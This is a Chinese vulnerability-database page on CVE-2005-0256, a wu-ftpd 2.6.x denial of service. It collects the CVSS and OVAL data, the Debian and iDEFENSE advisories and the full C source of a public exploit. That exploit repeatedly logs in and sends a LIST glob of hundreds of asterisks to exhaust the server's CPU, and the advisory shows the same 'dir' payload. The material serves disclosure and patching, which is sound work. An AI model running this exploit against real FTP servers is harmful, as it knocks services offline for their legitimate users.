CVE-2005-0256
CVSS5.0
发布时间 :2005-05-02 00:00:00
修订时间 :2011-03-07 00:00:00
NMCOEP    

[原文]The wu_fnmatch function in wu_fnmatch.c in wu-ftpd 2.6.1 and 2.6.2 allows remote attackers to cause a denial of service (CPU exhaustion by recursion) via a glob pattern with a large number of * (wildcard) characters, as demonstrated using the dir command.


[CNNVD]Wu-ftpd文件扩展远程拒绝服务漏洞(CNNVD-200505-441)

        Wu-ftpd是一个基于BSD ftpd的FTP服务器程序,由华盛顿大学维护。
        Wu-ftpd包含的wu_fnmatch.c文件中的wu_fnmatch()函数存在一个安全问题,远程攻击者可以利用这个漏洞对服务程序进行拒绝服务攻击。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-119 [内存缓冲区边界内操作的限制不恰当]

- CPE (受影响的平台与产品)

cpe:/a:washington_university:wu-ftpd:2.6.2
cpe:/a:washington_university:wu-ftpd:2.6.1

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:1762WU-FTPD "glob-*" Remote DoS Vulnerability (B.11.11)
oval:org.mitre.oval:def:1333WU-FTPD "glob-*" Remote DoS Vulnerability (B.11.00)
oval:org.mitre.oval:def:1265WU-FTPD "glob-*" Remote DoS Vulnerability (B.11.23)
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0256
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0256
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-441
(官方数据源) CNNVD

- 其它链接及资源

http://www.debian.org/security/2005/dsa-705
(VENDOR_ADVISORY)  DEBIAN  DSA-705
http://www.vupen.com/english/advisories/2006/1271
(VENDOR_ADVISORY)  VUPEN  ADV-2006-1271
http://www.vupen.com/english/advisories/2005/0588
(VENDOR_ADVISORY)  VUPEN  ADV-2005-0588
http://www.osvdb.org/14203
(UNKNOWN)  OSVDB  14203
http://www.idefense.com/application/poi/display?id=207&type=vulnerabilities
(UNKNOWN)  IDEFENSE  20050225 WU-FTPD File Globbing Denial of Service Vulnerability
http://sunsolve.sun.com/search/document.do?assetkey=1-26-57795-1
(UNKNOWN)  SUNALERT  57795
http://sunsolve.sun.com/search/document.do?assetkey=1-26-101699-1
(UNKNOWN)  SUNALERT  101699
http://secunia.com/advisories/19561
(VENDOR_ADVISORY)  SECUNIA  19561
http://secunia.com/advisories/18210
(VENDOR_ADVISORY)  SECUNIA  18210
http://secunia.com/advisories/14411
(VENDOR_ADVISORY)  SECUNIA  14411
http://itrc.hp.com/service/cki/docDisplay.do?docId=c00637342
(UNKNOWN)  HP  HPSBUX02110
http://itrc.hp.com/service/cki/docDisplay.do?docId=c00637342
(UNKNOWN)  HP  SSRT061110
ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.63/SCOSA-2005.63.txt
(UNKNOWN)  SCO  SCOSA-2005.63

- 漏洞信息

Wu-ftpd文件扩展远程拒绝服务漏洞
中危 未知
2005-05-02 00:00:00 2007-05-22 00:00:00
远程  
        Wu-ftpd是一个基于BSD ftpd的FTP服务器程序,由华盛顿大学维护。
        Wu-ftpd包含的wu_fnmatch.c文件中的wu_fnmatch()函数存在一个安全问题,远程攻击者可以利用这个漏洞对服务程序进行拒绝服务攻击。

- 公告与补丁

        暂无数据

- 漏洞信息 (842)

wu-ftpd <= 2.6.2 File Globbing Denial of Service Exploit (EDBID:842)
linux dos
2005-02-25 Verified
0 str0ke
N/A [点击下载]
/*
 * wu-ftpd <= 2.6.2 File Globbing DoS 
 * str0ke@milw0rm.com
 * 
 * Advisory: http://www.idefense.com/application/poi/display?id=207&type=vulnerabilities&flashstatus=true
 *
 * Adam Zabrocki (pi3 / pi3ki31ny) is credited with this discovery.
 */

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <unistd.h>

#define SERVER_PORT 21
usage(char *name)
{
printf("usage: %s -h hostname/ip -u user -p passwd\n",name);
printf("\t\t/str0ke!milw0rm.com wu-ftpd <= 2.6.2 File Globbing DoS\n");
exit(0);
}

main(int argc, char *argv[]) {
 char buffer[1000],host[255],user[255],pass[255],c;
 int sd, rc, i=0;
 struct sockaddr_in localAddr, servAddr;
 struct hostent *h;

if ( argc < 3) {
usage(argv[0]);
}

while ((c = getopt (argc, argv, "h:u:p:")) != EOF)
       switch(c)
       {
               case 'h':
                       strncpy(host,optarg,sizeof(host));
                       break;
               case 'u':
                       strncpy(user,optarg,sizeof(user));
                       break;
               case 'p':
                       strncpy(pass,optarg,sizeof(pass));
                       break;
       }

while(1) {

 h = gethostbyname(host);
 if(h==NULL) {
   printf("unknown host '%s'\n",host);
   exit(1);
 }

 servAddr.sin_family = h->h_addrtype;
 memcpy((char *) &servAddr.sin_addr.s_addr, h->h_addr_list[0], h->h_length);
 servAddr.sin_port = htons(SERVER_PORT);
 sd = socket(AF_INET, SOCK_STREAM, 0);
 if(sd<0) {
   perror("cannot open socket ");
   exit(1);
 }

 localAddr.sin_family = AF_INET;
 localAddr.sin_addr.s_addr = htonl(INADDR_ANY);
 localAddr.sin_port = htons(0);

 rc = bind(sd, (struct sockaddr *) &localAddr, sizeof(localAddr));
 if(rc<0) {
   printf("%d: cannot bind port TCP %u\n",sd,SERVER_PORT);
   perror("error ");
   exit(1);
 }

 printf("Trying To Connect To [%s]\n",host);
 rc = connect(sd, (struct sockaddr *) &servAddr, sizeof(servAddr));
 if(rc<0) {
   perror("cannot connect ");
   exit(1);
 }
   printf("Trying Login With [%s]\n",user);
   snprintf(buffer,sizeof(buffer), "USER %s\r\n", user);
   rc = send(sd, buffer, strlen(buffer), 0);
   memset(buffer,0,sizeof(buffer));

while(1)
       {
       rc=recv(sd,buffer,sizeof(buffer),0);
       if(strstr(buffer,"331")) break;
       if(strstr(buffer,"421"))
               {
               printf("Access Denied on your arse..\n");
               exit(0);
               }
       }

   printf("Sending Pass - [%s]\n",pass);
   memset(buffer,0,sizeof(buffer));
   snprintf(buffer,sizeof(buffer), "PASS %s\r\n", pass);
   rc = send(sd,buffer, strlen(buffer), 0);

while(1)
       {
       rc=recv(sd,buffer,sizeof(buffer),0);
       if(strstr(buffer,"230")) break;
       if(strstr(buffer,"421"))
               {
               printf("Access Denied on your arse..\n");
               exit(0);
               }

       if(strstr(buffer,"530"))
               {
               printf("Access Denied: Login Incorrect!\n");
               exit(0);
               }
}

   memset(buffer,0,sizeof(buffer));
   snprintf(buffer,sizeof(buffer), "LIST ***********************************************************************************************************************************************************************************************.*\r\n");
   rc = send(sd,buffer, strlen(buffer), 0);
   printf("Dos Sent\n");

}

   if(rc<0) {
     perror("cannot send data ");
     close(sd);
     exit(1);
   }
return 0;
}

// milw0rm.com [2005-02-25]
		

- 漏洞信息 (F36997)

dsa-705.txt (PacketStormID:F36997)
2005-04-17 00:00:00
 
advisory,denial of service
linux,debian
CVE-2005-0256,CVE-2005-0854
[点击下载]

Debian Security Advisory 705-1 - Several denial of service conditions have been discovered in wu-ftpd, the popular FTP daemon.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 705-1                     security@debian.org
http://www.debian.org/security/                             Martin Schulze
April 4th, 2005                         http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : wu-ftpd
Vulnerability  : missing input sanitising
Problem-Type   : remote
Debian-specific: no
CVE IDs        : CAN-2005-0256 CAN-2003-0854

Several denial of service conditions have been discovered in wu-ftpd,
the popular FTP daemon.  The Common Vulnerabilities and Exposures
project identifies the following problems:

CAN-2005-0256

    Adam Zabrocki discovered a denial of service condition in wu-ftpd
    that could be exploited by a remote user and cause the server to
    slow down the server by resource exhaustion.

CAN-2003-0854

    Georgi Guninski discovered that /bin/ls may be called from within
    wu-ftpd in a way that will result in large memory consumption and
    hence slow down the server.

For the stable distribution (woody) these problems have been fixed in
version 2.6.2-3woody5.

For the unstable distribution (sid) these problems have been fixed in
version 2.6.2-19.

We recommend that you upgrade your wu-ftpd package.


Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.0 alias woody
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/w/wu-ftpd/wu-ftpd_2.6.2-3woody5.dsc
      Size/MD5 checksum:      607 78463b3882e0d32102344bb0580e0d98
    http://security.debian.org/pool/updates/main/w/wu-ftpd/wu-ftpd_2.6.2-3woody5.diff.gz
      Size/MD5 checksum:   101661 967b719c02892c867ad0d6456a5dd47a
    http://security.debian.org/pool/updates/main/w/wu-ftpd/wu-ftpd_2.6.2.orig.tar.gz
      Size/MD5 checksum:   354784 b3c271f02aadf663b8811d1bff9da3f6

  Architecture independent components:

    http://security.debian.org/pool/updates/main/w/wu-ftpd/wu-ftpd-academ_2.6.2-3woody5_all.deb
      Size/MD5 checksum:     3484 cc6ee1aeb156077af311870f095840ab

  Alpha architecture:

    http://security.debian.org/pool/updates/main/w/wu-ftpd/wu-ftpd_2.6.2-3woody5_alpha.deb
      Size/MD5 checksum:   292630 c164f9f2d0ae5d70587ca49ddbe543b4

  ARM architecture:

    http://security.debian.org/pool/updates/main/w/wu-ftpd/wu-ftpd_2.6.2-3woody5_arm.deb
      Size/MD5 checksum:   265840 c86cdbc78969f755dce0facce4a1f882

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/w/wu-ftpd/wu-ftpd_2.6.2-3woody5_i386.deb
      Size/MD5 checksum:   255216 504af14aec48191405c08a56845d330b

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/w/wu-ftpd/wu-ftpd_2.6.2-3woody5_ia64.deb
      Size/MD5 checksum:   321932 ced4192d937ccedfa5a7ab2e9e77c378

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/w/wu-ftpd/wu-ftpd_2.6.2-3woody5_hppa.deb
      Size/MD5 checksum:   276624 4a1b5b6115ed1d93206c9787e8d37038

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/w/wu-ftpd/wu-ftpd_2.6.2-3woody5_m68k.deb
      Size/MD5 checksum:   249810 e873e950d3b234a7854ee0e4810783f5

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/w/wu-ftpd/wu-ftpd_2.6.2-3woody5_mips.deb
      Size/MD5 checksum:   273426 364c07d6a21f8aab43b3841ce98df8c6

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/w/wu-ftpd/wu-ftpd_2.6.2-3woody5_mipsel.deb
      Size/MD5 checksum:   273568 4e51f44342035b6ecafc624b1a6c06f3

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/w/wu-ftpd/wu-ftpd_2.6.2-3woody5_powerpc.deb
      Size/MD5 checksum:   268816 4072fbbb73bd8013b9a191f3aa7bd778

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/w/wu-ftpd/wu-ftpd_2.6.2-3woody5_s390.deb
      Size/MD5 checksum:   263638 d86fc84ab2974a80fd7407d826d8b003

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/w/wu-ftpd/wu-ftpd_2.6.2-3woody5_sparc.deb
      Size/MD5 checksum:   270784 1110401bccc9035cc1b30eb8146aee18


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.0 (GNU/Linux)

iD8DBQFCUVrbW5ql+IAeqTIRAj7YAJ4jaACcvzyz5FIsqndJjCo9SSD9HACgkoAY
F4qlQSHqDayJl++iAY686+k=
=yOi3
-----END PGP SIGNATURE-----

    

- 漏洞信息 (F36346)

iDEFENSE Security Advisory 2005-02-25.t (PacketStormID:F36346)
2005-02-28 00:00:00
iDefense Labs,Adam Zabrocki  idefense.com
advisory,remote,denial of service
CVE-2005-0256
[点击下载]

iDEFENSE Security Advisory 02.25.05 - Remote exploitation of an input validation vulnerability in version 2.6.2 of WU-FPTD could allow for a denial of service of the system by resource exhaustion.

WU-FTPD File Globbing Denial of Service Vulnerability

iDEFENSE Security Advisory 02.25.05
www.idefense.com/application/poi/display?id=207&type=vulnerabilities
February 25, 2005

I. BACKGROUND

WU-FTPD is an ftp daemon for Unix systems developed at Washington 
University. More information is available at:

    http://www.wu-ftpd.org/

II. DESCRIPTION

Remote exploitation of an input validation vulnerability in version
2.6.2 of WU-FPTD could allow for a denial of service of the system by 
resource exhaustion.

The vulnerability specifically exists in the wu_fnmatch() function in
wu_fnmatch.c. When a pattern containing a '*' character is supplied as 
input, the function calls itself recursively on a smaller substring. By 
supplying a string which contains a large number of '*' characters, the 
system will take a long time to return the results, during which time it

will be using a large amount of CPU time.

III. ANALYSIS

After a user logs into the ftpd, an attacker can send a simple command 
which will cause high CPU utilization.

To exploit this vulnerability, a simple ftp client is sufficient. Once
logged  in, either anonymously or as an authenticated user, issuing the
following command will cause the machine to become less responsive.

ftp> dir ***************************************************************
         ***************************************************************
         ***************************************************************
         **.*

By re-connecting and issuing the command multiple times, the system can
be made completely unresponsive. This may prevent legitimate access to 
services provided by the system for the period of the attack.

IV. DETECTION

iDEFENSE has confirmed the existence of this vulnerability in version 
2.6.2 and 2.6.1 of WU-FTPD. It is suspected that previous versions are 
also affected by this vulnerability.

V. WORKAROUND
Consider disabling the ftpd. If this is not viable as an option, 
consider disabling anonymous access. Disabling anonymous access will not

prevent local users from exploiting this vulnerability.

VI. VENDOR RESPONSE

No vendor response received.

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
names CAN-2005-0256 to these issues. This is a candidate for inclusion
in the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

02/09/2005  Initial vendor notification - No response
02/18/2005  Initial vendor notification - No response
02/25/2005  Public disclosure

IX. CREDIT

Adam Zabrocki (pi3 / pi3ki31ny) is credited with this discovery.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright (c) 2005 iDEFENSE, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDEFENSE. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
    

- 漏洞信息

14203
WU-FTPD wu_fnmatch() Function File Globbing Remote DoS
Remote / Network Access Denial of Service, Input Manipulation
Loss of Availability
Exploit Public

- 漏洞描述

WU-FTPD contains a flaw that may allow a remote attacker to cause a Denial of Service condition. The issue is due to the wu_fnmatch function in wu_fnmatch.c not properly sanitizing user input. With a specially crafted glob pattern combined with a large number of wildcard characters (*), an attacker can cause the service to use excessive CPU cycles and exhaust all available resources.

- 时间线

2005-02-25 2005-02-09
Unknow Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站